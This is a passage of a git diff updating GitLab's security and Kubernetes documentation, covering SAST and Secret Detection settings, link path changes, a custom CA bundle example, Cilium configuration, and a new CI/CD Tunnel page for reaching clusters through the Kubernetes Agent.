SpotBugs | Path to the `sbt` executable. | | `FAIL_NEVER` | SpotBugs | Set to `1` to ignore compilation failure. | | `SAST_GOSEC_CONFIG` | Gosec | **{warning}** **[Removed](https://gitlab.com/gitlab-org/gitlab/-/issues/328301)** in GitLab 14.0 - use custom rulesets instead. Path to configuration for Gosec (optional). | -| `PHPCS_SECURITY_AUDIT_PHP_EXTENSIONS` | phpcs-security-audit | Comma separated list of additional PHP Extensions. | -| `SAST_DISABLE_BABEL` | NodeJsScan | **{warning}** **[Removed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/64025)** in GitLab 13.5 | +| `PHPCS_SECURITY_AUDIT_PHP_EXTENSIONS` | phpcs-security-audit | Comma separated list of additional PHP Extensions. | +| `SAST_DISABLE_BABEL` | NodeJsScan | **{warning}** **[Removed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/64025)** in GitLab 13.5 | | `SAST_SEMGREP_METRICS` | Semgrep | Set to `"false"` to disable sending anonymized scan metrics to [r2c](https://r2c.dev/). Default: `true`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/330565) in GitLab 14.0. | #### Custom CI/CD variables @@ -519,7 +521,7 @@ Some analyzers can be customized with CI/CD variables. > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/18193) in GitLab Ultimate 12.5. In addition to the aforementioned SAST configuration CI/CD variables, -all [custom variables](../../../ci/variables/README.md#custom-cicd-variables) are propagated +all [custom variables](../../../ci/variables/index.md#custom-cicd-variables) are propagated to the underlying SAST analyzer images if [the SAST vendored template](#configuration) is used. @@ -554,7 +556,7 @@ The SAST tool emits a JSON report file. For more information, see the [schema for this report](https://gitlab.com/gitlab-org/security-products/security-report-schemas/-/blob/master/dist/sast-report-format.json). The JSON report file can be downloaded from the CI pipelines page, or the -pipelines tab on merge requests by [setting `artifacts: paths`](../../../ci/yaml/README.md#artifactspaths) to `gl-sast-report.json`. For more information see [Downloading artifacts](../../../ci/pipelines/job_artifacts.md). +pipelines tab on merge requests by [setting `artifacts: paths`](../../../ci/yaml/index.md#artifactspaths) to `gl-sast-report.json`. For more information see [Downloading artifacts](../../../ci/pipelines/job_artifacts.md). Here's an example SAST report: @@ -763,7 +765,7 @@ uses the `rules:exists` parameter. For performance reasons, a maximum number of against the given glob pattern. If the number of matches exceeds the maximum, the `rules:exists` parameter returns `true`. Depending on the number of files in your repository, a SAST job might be triggered even if the scanner doesn't support your project. For more details about this issue, see -the [`rules:exists` documentation](../../../ci/yaml/README.md#rulesexists). +the [`rules:exists` documentation](../../../ci/yaml/index.md#rulesexists). ### SpotBugs UTF-8 unmappable character errors @@ -789,7 +791,7 @@ For Maven builds, add the following to your `pom.xml` file: ### Flawfinder encoding error -This occurs when Flawfinder encounters an invalid UTF-8 character. To fix this, convert all source code in your project to UTF-8 character encoding. This can be done with [`cvt2utf`](https://github.com/x1angli/cvt2utf) or [`iconv`](https://www.gnu.org/software/libiconv/documentation/libiconv-1.13/iconv.1.html) either over the entire project or per job using the [`before_script`](../../../ci/yaml/README.md#before_script) feature. +This occurs when Flawfinder encounters an invalid UTF-8 character. To fix this, convert all source code in your project to UTF-8 character encoding. This can be done with [`cvt2utf`](https://github.com/x1angli/cvt2utf) or [`iconv`](https://www.gnu.org/software/libiconv/documentation/libiconv-1.13/iconv.1.html) either over the entire project or per job using the [`before_script`](../../../ci/yaml/index.md#before_script) feature. ### Semgrep slowness, unexpected results, or other errors diff --git a/doc/user/application_security/secret_detection/index.md b/doc/user/application_security/secret_detection/index.md index f4aa9dc2787..938bd3b41d5 100644 --- a/doc/user/application_security/secret_detection/index.md +++ b/doc/user/application_security/secret_detection/index.md @@ -133,24 +133,14 @@ The included template creates Secret Detection jobs in your CI/CD pipeline and s your project's source code for secrets. The results are saved as a -[Secret Detection report artifact](../../../ci/yaml/README.md#artifactsreportssecret_detection) +[Secret Detection report artifact](../../../ci/yaml/index.md#artifactsreportssecret_detection) that you can later download and analyze. Due to implementation limitations, we always take the latest Secret Detection artifact available. ### Enable Secret Detection via an automatic merge request **(ULTIMATE SELF)** -> - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/4496) in GitLab 13.11. -> - [Deployed behind a feature flag](../../../user/feature_flags.md), enabled by default. -> - Enabled on GitLab.com. -> - Recommended for production use. -> - For GitLab self-managed instances, GitLab administrators can opt to [disable it](#enable-or-disable-configure-secret-detection-via-a-merge-request). **(ULTIMATE SELF)** - -WARNING: -This feature might not be available to you. Check the **version history** note above for details. - -There can be -[risks when disabling released features](../../../user/feature_flags.md#risks-when-disabling-released-features). -Refer to this feature's version history for more details. +> - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/4496) in GitLab 13.11, behind a feature flag, enabled by default. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/329886) in GitLab 14.1. To enable Secret Detection in a project, you can create a merge request from the Security Configuration page. @@ -166,15 +156,15 @@ that you can review and merge to complete the configuration. The Secret Detection scan settings can be changed through [CI/CD variables](#available-cicd-variables) by using the -[`variables`](../../../ci/yaml/README.md#variables) parameter in `.gitlab-ci.yml`. +[`variables`](../../../ci/yaml/index.md#variables) parameter in `.gitlab-ci.yml`. To override a job definition, (for example, change properties like `variables` or `dependencies`), declare a job with the same name as the SAST job to override. Place this new job after the template inclusion and specify any additional keys under it. WARNING: -Beginning in GitLab 13.0, the use of [`only` and `except`](../../../ci/yaml/README.md#only--except) -is no longer supported. When overriding the template, you must use [`rules`](../../../ci/yaml/README.md#rules) instead. +Beginning in GitLab 13.0, the use of [`only` and `except`](../../../ci/yaml/index.md#only--except) +is no longer supported. When overriding the template, you must use [`rules`](../../../ci/yaml/index.md#rules) instead. #### GIT_DEPTH @@ -197,7 +187,7 @@ secret_detection: SECRET_DETECTION_HISTORIC_SCAN: "true" ``` -Because the template is [evaluated before](../../../ci/yaml/README.md#include) +Because the template is [evaluated before](../../../ci/yaml/index.md#include) the pipeline configuration, the last mention of the variable takes precedence. #### Available CI/CD variables @@ -285,7 +275,7 @@ Post-processing is currently limited to a project's default branch, see the abov sequenceDiagram autonumber Rails->>+Sidekiq: gl-secret-detection-report.json - Sidekiq-->+Sidekiq: BuildFinishedWorker + Sidekiq-->+Sidekiq: Ci::BuildFinishedWorker Sidekiq-->+RevocationAPI: GET revocable keys types RevocationAPI-->>-Sidekiq: OK Sidekiq->>+RevocationAPI: POST revoke revocable keys @@ -360,6 +350,21 @@ Support for custom certificate authorities was introduced in the following versi | -------- | ------- | | secrets | [v3.0.0](https://gitlab.com/gitlab-org/security-products/analyzers/secrets/-/releases/v3.0.0) | +To trust a custom Certificate Authority, set the `ADDITIONAL_CA_CERT_BUNDLE` variable to the bundle +of CA certs that you want to trust in the SAST environment. The `ADDITIONAL_CA_CERT_BUNDLE` value should contain the [text representation of the X.509 PEM public-key certificate](https://tools.ietf.org/html/rfc7468#section-5.1). For example, to configure this value in the `.gitlab-ci.yml` file, use the following: + +```yaml +variables: + ADDITIONAL_CA_CERT_BUNDLE: | + -----BEGIN CERTIFICATE----- + MIIGqTCCBJGgAwIBAgIQI7AVxxVwg2kch4d56XNdDjANBgkqhkiG9w0BAQsFADCB + ... + jWgmPqF3vUbZE0EyScetPJquRFRKIesyJuBFMAs= + -----END CERTIFICATE----- +``` + +The `ADDITIONAL_CA_CERT_BUNDLE` value can also be configured as a [custom variable in the UI](../../../ci/variables/index.md#custom-cicd-variables), either as a `file`, which requires the path to the certificate, or as a variable, which requires the text representation of the certificate. + ### Set Secret Detection CI/CD variables to use local Secret Detection analyzer Add the following configuration to your `.gitlab-ci.yml` file. You must replace @@ -385,7 +390,7 @@ For information on this, see the [general Application Security troubleshooting s ### Error: `Couldn't run the gitleaks command: exit status 2` If a pipeline is triggered from a Merge Request containing 60 commits while the `GIT_DEPTH` variable -is set to 50 (a [project default](../../../ci/pipelines/settings.md#git-shallow-clone)), +is set to 50 (a [project default](../../../ci/pipelines/settings.md#limit-the-number-of-changes-fetched-during-clone)), the Secret Detection job fails as the clone is not deep enough to contain all of the relevant commits. @@ -409,22 +414,3 @@ secret_detection: variables: GIT_DEPTH: 100 ``` - -### Enable or disable Configure Secret Detection via a Merge Request - -Configure Secret Detection via a Merge Request is under development but ready for production use. -It is deployed behind a feature flag that is **enabled by default**. -[GitLab administrators with access to the GitLab Rails console](../../../administration/feature_flags.md) -can opt to disable it. - -To enable it: - -```ruby -Feature.enable(:sec_secret_detection_ui_enable) -``` - -To disable it: - -```ruby -Feature.disable(:sec_secret_detection_ui_enable) -``` diff --git a/doc/user/application_security/security_dashboard/index.md b/doc/user/application_security/security_dashboard/index.md index 01de066367c..806bc03e30e 100644 --- a/doc/user/application_security/security_dashboard/index.md +++ b/doc/user/application_security/security_dashboard/index.md @@ -33,13 +33,14 @@ The security dashboard and vulnerability report displays information about vulne - [Dynamic Application Security Testing](../dast/index.md) - [Dependency Scanning](../dependency_scanning/index.md) - [Static Application Security Testing](../sast/index.md) +- [Cluster Image Scanning](../cluster_image_scanning/index.md) - And [others](../index.md#security-scanning-tools)! ## Prerequisites 1. At least one project inside a group must be configured with at least one of the [supported reports](#supported-reports). -1. The configured jobs must use the [new `reports` syntax](../../../ci/yaml/README.md#artifactsreports). +1. The configured jobs must use the [new `reports` syntax](../../../ci/yaml/index.md#artifactsreports). 1. [GitLab Runner](https://docs.gitlab.com/runner/) 11.5 or newer must be used. If you're using the shared runners on GitLab.com, this is already the case. @@ -76,7 +77,7 @@ CSV file containing details of the resources scanned. > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/285477) in GitLab 13.11, date range slider to visualize data between given dates. A project's Security Dashboard displays a chart with the total number of vulnerabilities -over time. It updates daily with up to 365 days of historical data. By default, +over time with up to 365 days of historical data. Data is refreshed daily at 1:15am UTC. By default, it shows statistics for all vulnerability severities. To access the dashboard, from your project's home page go to **Security & Compliance > Security Dashboard**. diff --git a/doc/user/application_security/terminology/index.md b/doc/user/application_security/terminology/index.md index ce30accfb4d..c96497e9233 100644 --- a/doc/user/application_security/terminology/index.md +++ b/doc/user/application_security/terminology/index.md @@ -118,6 +118,7 @@ The type of scan. This must be one of the following: - `dependency_scanning` - `dast` - `sast` +- `cluster_image_scanning` ### Scanner diff --git a/doc/user/application_security/threat_monitoring/index.md b/doc/user/application_security/threat_monitoring/index.md index e1200c60419..8cecb9c5929 100644 --- a/doc/user/application_security/threat_monitoring/index.md +++ b/doc/user/application_security/threat_monitoring/index.md @@ -27,20 +27,19 @@ your application's Kubernetes namespace. This section has the following prerequisites: - Your project contains at least one [environment](../../../ci/environments/index.md) -- You've [installed Cilium](../../clusters/applications.md#install-cilium-using-gitlab-cicd) +- You've [installed Cilium](../../project/clusters/protect/container_network_security/quick_start_guide.md#use-the-cluster-management-template-to-install-cilium) - You've configured the [Prometheus service](../../project/integrations/prometheus.md#enabling-prometheus-integration) If you're using custom Helm values for Cilium, you must enable Hubble with flow metrics for each namespace by adding the following lines to -your [Cilium values](../../clusters/applications.md#install-cilium-using-gitlab-cicd): +your [Cilium values](../../project/clusters/protect/container_network_security/quick_start_guide.md#use-the-cluster-management-template-to-install-cilium): ```yaml -global: - hubble: - enabled: true - metrics: - enabled: - - 'flow:sourceContext=namespace;destinationContext=namespace' +hubble: + enabled: true + metrics: + enabled: + - 'flow:sourceContext=namespace;destinationContext=namespace' ``` The **Container Network Policy** section displays the following information @@ -54,7 +53,11 @@ about your packet flow: If a significant percentage of packets is dropped, you should investigate it for potential threats by -[examining the Cilium logs](../../clusters/applications.md#install-cilium-using-gitlab-cicd). +examining the Cilium logs: + +```shell +kubectl -n gitlab-managed-apps logs -l k8s-app=cilium -c cilium-monitor +``` ## Container Network Policy management @@ -67,7 +70,7 @@ status, and create and edit deployed policies. This section has the following prerequisites: - Your project contains at least one [environment](../../../ci/environments/index.md) -- You've [installed Cilium](../../clusters/applications.md#install-cilium-using-gitlab-cicd) +- You've [installed Cilium](../../project/clusters/protect/container_network_security/quick_start_guide.md#use-the-cluster-management-template-to-install-cilium) Network policies are fetched directly from the selected environment's deployment platform. Changes performed outside of this tab are diff --git a/doc/user/application_security/vulnerabilities/index.md b/doc/user/application_security/vulnerabilities/index.md index 9866709bacc..6437f2325e8 100644 --- a/doc/user/application_security/vulnerabilities/index.md +++ b/doc/user/application_security/vulnerabilities/index.md @@ -164,7 +164,7 @@ The following vulnerability scanners and their databases are regularly updated: |:----------------------------------------------------------------|----------------------------------| | [Container Scanning](../container_scanning/index.md) | A job runs on a daily basis to build new images with the latest vulnerability database updates from the upstream scanner. | | [Dependency Scanning](../dependency_scanning/index.md) | Relies on `bundler-audit` (for Ruby gems), `retire.js` (for npm packages), and `gemnasium` (the GitLab tool for all libraries). Both `bundler-audit` and `retire.js` fetch their vulnerabilities data from GitHub repositories, so vulnerabilities added to `ruby-advisory-db` and `retire.js` are immediately available. The tools themselves are updated once per month if there's a new version. The [Gemnasium DB](https://gitlab.com/gitlab-org/security-products/gemnasium-db) is updated at least once a week. See our [current measurement of time from CVE being issued to our product being updated](https://about.gitlab.com/handbook/engineering/development/performance-indicators/#cve-issue-to-update). | -| [Dynamic Application Security Testing (DAST)](../dast/index.md) | The scanning engine is updated on a periodic basis. See the [version of the underlying tool `zaproxy`](https://gitlab.com/gitlab-org/security-products/dast/blob/master/Dockerfile#L1). The scanning rules are downloaded at scan runtime. | +| [Dynamic Application Security Testing (DAST)](../dast/index.md) | The scanning engine is updated on a periodic basis. See the [version of the underlying tool `zaproxy`](https://gitlab.com/gitlab-org/security-products/dast/blob/main/Dockerfile#L1). The scanning rules are downloaded at scan runtime. | | [Static Application Security Testing (SAST)](../sast/index.md) | Relies exclusively on [the tools GitLab wraps](../sast/index.md#supported-languages-and-frameworks). The underlying analyzers are updated at least once per month if a relevant update is available. The vulnerabilities database is updated by the upstream tools. | You do not have to update GitLab to benefit from the latest vulnerabilities definitions. diff --git a/doc/user/application_security/vulnerability_report/index.md b/doc/user/application_security/vulnerability_report/index.md index 07025d193af..da59c0fbe79 100644 --- a/doc/user/application_security/vulnerability_report/index.md +++ b/doc/user/application_security/vulnerability_report/index.md @@ -128,11 +128,11 @@ To view the relevant file, select the filename in the vulnerability's details. ## View issues raised for a vulnerability The **Activity** column indicates the number of issues that have been created for the vulnerability. -Hover over an **Activity** entry and select a link go to that issue. The status of whether the issue is open or closed also displays in the hover menu. +Hover over an **Activity** entry and select a link go to that issue. The status of whether the issue is open or closed also displays in the hover menu.  -If Jira issue support is enabled, the issue link found in the Activity entry links out to the issue in Jira. Unlike GitLab issues, the status of whether a Jira issue is Open or Closed does not display in the GitLab UI. +If Jira issue support is enabled, the issue link found in the Activity entry links out to the issue in Jira. Unlike GitLab issues, the status of whether a Jira issue is Open or Closed does not display in the GitLab UI. ## Change status of vulnerabilities diff --git a/doc/user/clusters/agent/ci_cd_tunnel.md b/doc/user/clusters/agent/ci_cd_tunnel.md new file mode 100644 index 00000000000..1f794bac37f --- /dev/null +++ b/doc/user/clusters/agent/ci_cd_tunnel.md @@ -0,0 +1,67 @@ +--- +stage: Configure +group: Configure +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# CI/CD Tunnel + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/327409) in GitLab 14.1. + +The CI/CD Tunnel enables users to access Kubernetes clusters from GitLab CI/CD jobs even if there is no network +connectivity between GitLab Runner and a cluster. GitLab Runner does not have to be running in the same cluster. + +Only CI/CD jobs set in the configuration project can access one of the configured agents. + +Prerequisites: + +- A running [`kas` instance](index.md#set-up-the-kubernetes-agent-server). +- A [configuration repository](index.md#define-a-configuration-repository) with an Agent config file + installed (`.gitlab/agents/<agent-name>/config.yaml`). +- An [Agent record](index.md#create-an-agent-record-in-gitlab). +- The agent is [installed in the cluster](index.md#install-the-agent-into-the-cluster). + +To access your cluster from a CI/CD job through the tunnel: + +1. In your `.gitlab-ci.yml` add a section that creates a `kubectl` compatible configuration file (`kubecontext`) and use it in one + or more jobs: + + ```yaml + variables: + AGENT_ID: 4 # agent id that you got when you created the agent record + KUBE_CFG_FILE: "$CI_PROJECT_DIR/.kubeconfig.agent.yaml" + + .kubectl_config: &kubectl_config + - | + cat << EOF > "$KUBE_CFG_FILE" + apiVersion: v1 + kind: Config + clusters: + - name: agent + cluster: + server: https://kas.gitlab.com/k8s-proxy/ + users: + - name: agent + user: + token: "ci:$AGENT_ID:$CI_JOB_TOKEN" + contexts: + - name: agent + context: + cluster: agent + user: agent + current-context: agent + EOF + + deploy: + image: + name: bitnami/kubectl:latest + entrypoint: [""] + script: + - *kubectl_config + - kubectl --kubeconfig="$KUBE_CFG_FILE" get pods + ``` + +1. Execute `kubectl` commands directly against your cluster with this CI/CD job you just created. + +We are working on [creating the configuration file automatically](https://gitlab.com/gitlab-org/gitlab/-/issues/324275) +to simplify the process. diff --git a/doc/user/clusters/agent/index.md b/doc/user/clusters/agent/index.md index 414ed8377db..83933524fd4 100644 --- a/doc/user/clusters/agent/index.md +++ b/doc/user/clusters/agent/index.md @@ -7,7 +7,8 @@ info: To determine the technical writer assigned to the Stage/Group associated w # GitLab Kubernetes Agent **(PREMIUM)** > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/223061) in [GitLab Premium](https://about.gitlab.com/pricing/) 13.4. -> - [In GitLab 13.10](https://gitlab.com/gitlab-org/gitlab/-/issues/300960), KAS became available on GitLab.com under `wss://kas.gitlab.com` through an Early Adopter Program. +> - [Introduced](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/issues/7) in GitLab 13.6, `grpcs` is supported. +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/300960) in GitLab 13.10, KAS became available on GitLab.com under `wss://kas.gitlab.com` through an Early Adopter Program. > - Introduced in GitLab 13.11, the GitLab Kubernetes Agent became available to every project on GitLab.com. The [GitLab Kubernetes Agent](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent) @@ -16,13 +17,14 @@ tasks in a secure and cloud-native way. It enables: - Integrating GitLab with a Kubernetes cluster behind a firewall or NAT (network address translation). -- Pull-based GitOps deployments by leveraging the - [GitOps Engine](https://github.com/argoproj/gitops-engine). +- Pull-based GitOps deployments. +- [Inventory object](../../infrastructure/clusters/deploy/inventory_object.md) to keep track of objects applied to your cluster. - Real-time access to API endpoints in a cluster. - Alert generation based on [Container network policy](../../application_security/threat_monitoring/index.md#container-network-policy). +- [CI/CD Tunnel](ci_cd_tunnel.md) that enables users to access Kubernetes clusters from GitLab CI/CD jobs even if there is no network connectivity between GitLab Runner and a cluster. Many more features are planned. Please review [our roadmap](https://gitlab.com/groups/gitlab-org/-/epics/3329) -and [our development documentation](../../../development/agent/index.md). +and [our development documentation](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/tree/master/doc). ## GitLab Agent GitOps workflow @@ -37,7 +39,9 @@ sequenceDiagram participant M as Manifest repository participant K as Kubernetes Agent participant C as Agent configuration repository - K->C: Grab the configuration + loop Regularly + K-->>C: Grab the configuration + end D->>+A: Pushing code changes A->>M: Updating manifest loop Regularly @@ -246,12 +250,11 @@ example [`resources.yml` file](#example-resourcesyml-file) in the following ways - Specify the `grpc` scheme if both Agent and Server are installed in one cluster. In this case, you may specify `kas-address` value as `grpc://gitlab-kas.<your-namespace>:8150`) to use gRPC directly, where `gitlab-kas` - is the name of the service created by `gitlab-kas` chart, and `your-namespace` - is the namespace where the chart was installed. Encrypted gRPC is not supported yet. - Follow the - [Support TLS for gRPC communication issue](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/issues/7) - for progress updates. - - When deploying KAS through the [GitLab chart](https://docs.gitlab.com/charts/), it's possible to customize the `kas-address` for `wss` and `ws` schemes to whatever you need. + is the name of the service created by `gitlab-kas` chart, and `<your-namespace>` + is the namespace where the chart was installed. + - Specify the `grpcs` scheme to use an encrypted gRPC connection. + - When deploying KAS through the [GitLab chart](https://docs.gitlab.com/charts/), it's possible to customize the + `kas-address` for `wss` and `ws` schemes to whatever you need. Check the [chart's KAS Ingress documentation](https://docs.gitlab.com/charts/charts/gitlab/kas/#ingress) to learn more about it. - In the near future, Omnibus GitLab intends to provision `gitlab-kas` under a sub-domain by default, instead of the `/-/kubernetes-agent/` path. Please follow [this issue](https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/5784) for details. @@ -447,42 +450,21 @@ There are several components that work in concert for the Agent to generate the - A working Kubernetes cluster. - Cilium integration through either of these options: - - Installation through [GitLab Managed Apps](../applications.md#install-cilium-using-gitlab-cicd). + - Installation through [cluster management template](../../project/clusters/protect/container_network_security/quick_start_guide.md#use-the-cluster-management-template-to-install-cilium). - Enablement of [hubble-relay](https://docs.cilium.io/en/v1.8/concepts/overview/#hubble) on an existing installation. - One or more network policies through any of these options: - Use the [Container Network Policy editor](../../application_security/threat_monitoring/index.md#container-network-policy-editor) to create and manage policies. - Use an [AutoDevOps](../../application_security/threat_monitoring/index.md#container-network-policy-management) configuration. - Add the required labels and annotations to existing network policies. -- Use a configuration repository to inform the Agent through a `config.yaml` file, which - repositories can synchronize with. This repository might be the same, or a separate GitLab - project. +- A configuration repository with [Cilium configured in `config.yaml`](repository.md#surface-network-security-alerts-from-cluster-to-gitlab) The setup process follows the same steps as [GitOps](#get-started-with-gitops-and-the-gitlab-agent), with the following differences: -- When you define a configuration repository, you must do so with [Cilium settings](#define-a-configuration-repository-with-cilium-settings). +- When you define a configuration repository, you must do so with [Cilium settings](repository.md#surface-network-security-alerts-from-cluster-to-gitlab). - You do not need to specify the `gitops` configuration section. -### Define a configuration repository with Cilium settings - -You need a GitLab repository to contain your Agent configuration. The minimal repository layout -looks like this: - -```plaintext -.gitlab/agents/<agent-name>/config.yaml -``` - -Your `config.yaml` file must specify the `host` and `port` of your Hubble Relay service. If your -Cilium integration was performed through [GitLab Managed Apps](../applications.md#install-cilium-using-gitlab-cicd), -you can use `hubble-relay.gitlab-managed-apps.svc.cluster.local:80`: - -```yaml -cilium: - hubble_relay_address: "<hubble-relay-host>:<hubble-relay-port>" - ... -``` - ## Management interfaces Users with at least the [Developer](../../permissions.md) can access the user interface @@ -516,9 +498,17 @@ This error is shown if there are some connectivity issues between the address specified as `kas-address`, and your Agent pod. To fix it, make sure that you specified the `kas-address` correctly. +```json +{"level":"error","time":"2021-06-25T21:15:45.335Z","msg":"Reverse tunnel","mod_name":"reverse_tunnel","error":"Connect(): rpc error: code = Unavailable desc = connection error: desc= \"transport: Error while dialing failed to WebSocket dial: expected handshake response status code 101 but got 301\""} +``` + +This error occurs if the `kas-address` doesn't include a trailing slash. To fix it, make sure that the +`wss` or `ws` URL ends with a training slash, such as `wss://GitLab.host.tld:443/-/kubernetes-agent/` +or `ws://GitLab.host.tld:80/-/kubernetes-agent/`. + ### Agent logs - ValidationError(Deployment.metadata) -```plaintext +```json {"level":"info","time":"2020-10-30T08:56:54.329Z","msg":"Synced","project_id":"root/kas-manifest001","resource_key":"apps/Deployment/kas-test001/nginx-deployment","sync_result":"error validating data: [ValidationError(Deployment.metadata): unknown field \"replicas\" in io.k8s.apimachinery.pkg.apis.meta.v1.ObjectMeta, ValidationError(Deployment.metadata): unknown field \"selector\" in io.k8s.apimachinery.pkg.apis.meta.v1.ObjectMeta, ValidationError(Deployment.metadata): unknown field \"template\" in io.k8s.apimachinery.pkg.apis.meta.v1.ObjectMeta]"} ``` diff --git a/doc/user/clusters/agent/repository.md b/doc/user/clusters/agent/repository.md index cd40cc6810e..a3a3e4c29b0 100644 --- a/doc/user/clusters/agent/repository.md +++ b/doc/user/clusters/agent/repository.md @@ -8,7 +8,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/259669) in [GitLab Premium](https://about.gitlab.com/pricing/) 13.7. > - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/3834) in GitLab 13.11, the Kubernetes Agent became available on GitLab.com. -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/332227) in GitLab 14.0, the `resource_inclusions` and `resource_exclusions` attributes were removed. +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/332227) in GitLab 14.0, the `resource_inclusions` and `resource_exclusions` attributes were removed and `reconcile_timeout`, `dry_run_strategy`, `prune`, `prune_timeout`, `prune_propagation_policy`, and `inventory_policy` attributes were added. WARNING: This feature might not be available to you. Check the **version history** note above for details. @@ -51,6 +51,7 @@ gitops: # in YAML or JSON format. - id: gitlab-org/cluster-integration/gitlab-agent # Namespace to use if not set explicitly in object manifest. + # Also used for inventory ConfigMap objects. default_namespace: my-ns # Paths inside of the repository to scan for manifest files. # Directories with names starting with a dot are ignored. @@ -84,13 +85,13 @@ gitops: # https://github.com/kubernetes/apimachinery/blob/44113beed5d39f1b261a12ec398a356e02358307/pkg/apis/meta/v1/types.go#L456-L470 # Can be: orphan, background, foreground prune_propagation_policy: foreground # 'foreground' by default - # InventoryPolicy defines if an inventory object can take over + # Inventory policy defines if an inventory object can take over # objects that belong to another inventory object or don't # belong to any inventory object. # This is done by determining if the apply/prune operation # can go through for a resource based on the comparison # the inventory-id value in the package and the owning-inventory - # annotation in the live object. + # annotation (config.k8s.io/owning-inventory) in the live object. # https://github.com/kubernetes-sigs/cli-utils/blob/d6968048dcd80b1c7b55d9e4f31fc25f71c9b490/pkg/inventory/policy.go#L12-L66 # Can be: must_match, adopt_if_no_inventory, adopt_all inventory_policy: must_match # 'must_match' by default @@ -157,7 +158,9 @@ cilium: hubble_relay_address: "<hubble-relay-host>:<hubble-relay-port>" ``` -If your Cilium integration was performed through GitLab Managed Apps, you can use `hubble-relay.gitlab-managed-apps.svc.cluster.local:80` as the address: +If your Cilium integration was performed through [GitLab Managed Apps](../applications.md#install-cilium-using-gitlab-cicd) or the +[cluster management template](../../project/clusters/protect/container_network_security/quick_start_guide.md#use-the-cluster-management-template-to-install-cilium), +you can use `hubble-relay.gitlab-managed-apps.svc.cluster.local:80` as the address: ```yaml cilium: diff --git a/doc/user/clusters/applications.md b/doc/user/clusters/applications.md index a6aa4e00005..5d247f04d3b 100644 --- a/doc/user/clusters/applications.md +++ b/doc/user/clusters/applications.md @@ -90,7 +90,7 @@ To install applications using GitLab CI/CD: 1. Optionally, define `.gitlab/managed-apps/<application>/values.yaml` file to customize values for the installed application. -A GitLab CI/CD pipeline runs on the `master` branch to install the +A GitLab CI/CD pipeline runs on the default branch to install the applications you have configured. In case of pipeline failure, the output of the [Helm Tiller](https://v2.helm.sh/docs/install/#running-tiller-locally) binary is saved as a [CI job artifact](../../ci/pipelines/job_artifacts.md). @@ -391,16 +391,16 @@ For GitLab Runner to function, you _must_ specify the following: - `gitlabUrl`: The GitLab server full URL (for example, `https://gitlab.example.com`) to register the Runner against. - `runnerRegistrationToken`: The registration token for adding new runners to GitLab. - This must be [retrieved from your GitLab instance](../../ci/runners/README.md). + This must be [retrieved from your GitLab instance](../../ci/runners/index.md). -These values can be specified using [CI/CD variables](../../ci/variables/README.md): +These values can be specified using [CI/CD variables](../../ci/variables/index.md): - `GITLAB_RUNNER_GITLAB_URL` is used for `gitlabUrl`. - `GITLAB_RUNNER_REGISTRATION_TOKEN` is used for `runnerRegistrationToken` The methods of specifying these values are mutually exclusive. Either specify variables `GITLAB_RUNNER_REGISTRATION_TOKEN` and `GITLAB_RUNNER_TOKEN` as CI variables (recommended) or provide values for `runnerRegistrationToken:` and `runnerToken:` in `.gitlab/managed-apps/gitlab-runner/values.yaml`. If you choose to use CI variables, comment out or remove `runnerRegistrationToken:` and `runnerToken:` from `.gitlab/managed-apps/gitlab-runner/values`. -The runner registration token allows connection to a project by a runner and therefore should be treated as a secret to prevent malicious use and code exfiltration through a runner. For this reason, we recommend that you specify the runner registration token as a [protected variable](../../ci/variables/README.md#protect-a-cicd-variable) and [masked variable](../../ci/variables/README.md#mask-a-cicd-variable) and do not commit them to the Git repository in the `values.yaml` file. +The runner registration token allows connection to a project by a runner and therefore should be treated as a secret to prevent malicious use and code exfiltration through a runner. For this reason, we recommend that you specify the runner registration token as a [protected variable](../../ci/variables/index.md#protect-a-cicd-variable) and [masked variable](../../ci/variables/index.md#mask-a-cicd-variable) and do not commit them to the Git repository in the `values.yaml` file. You can customize the installation of GitLab Runner by defining `.gitlab/managed-apps/gitlab-runner/values.yaml` file in your cluster @@ -440,8 +440,8 @@ cilium: The `clusterType` variable enables the recommended Helm variables for a corresponding cluster type. You can check the recommended variables for each cluster type in the official documentation: -- [Google GKE](https://docs.cilium.io/en/stable/gettingstarted/k8s-install-gke/#deploy-cilium) -- [AWS EKS](https://docs.cilium.io/en/stable/gettingstarted/k8s-install-eks/#deploy-cilium) +- [Google GKE](https://docs.cilium.io/en/v1.8/gettingstarted/k8s-install-gke/#deploy-cilium) +- [AWS EKS](https://docs.cilium.io/en/v1.8/gettingstarted/k8s-install-eks/#deploy-cilium) Do not use `clusterType` for sandbox environments like [Minikube](https://minikube.sigs.k8s.io/docs/). @@ -460,7 +460,7 @@ You can check Cilium's installation status on the cluster management page: WARNING: Installation and removal of the Cilium requires a **manual** -[restart](https://docs.cilium.io/en/stable/gettingstarted/k8s-install-gke/#restart-unmanaged-pods) +[restart](https://docs.cilium.io/en/stable/gettingstarted/k8s-install-helm/#restart-unmanaged-pods) of all affected pods in all namespaces to ensure that they are [managed](https://docs.cilium.io/en/v1.8/operations/troubleshooting/#ensure-managed-pod) by the correct networking plugin. Whenever Hubble is enabled, its related pod might require a @@ -762,7 +762,7 @@ Set: - "Redirect URI" to `http://<JupyterHub Host>/hub/oauth_callback`. - "Scope" to `api read_repository write_repository`. -In addition, the following variables must be specified using [CI/CD variables](../../ci/variables/README.md): +In addition, the following variables 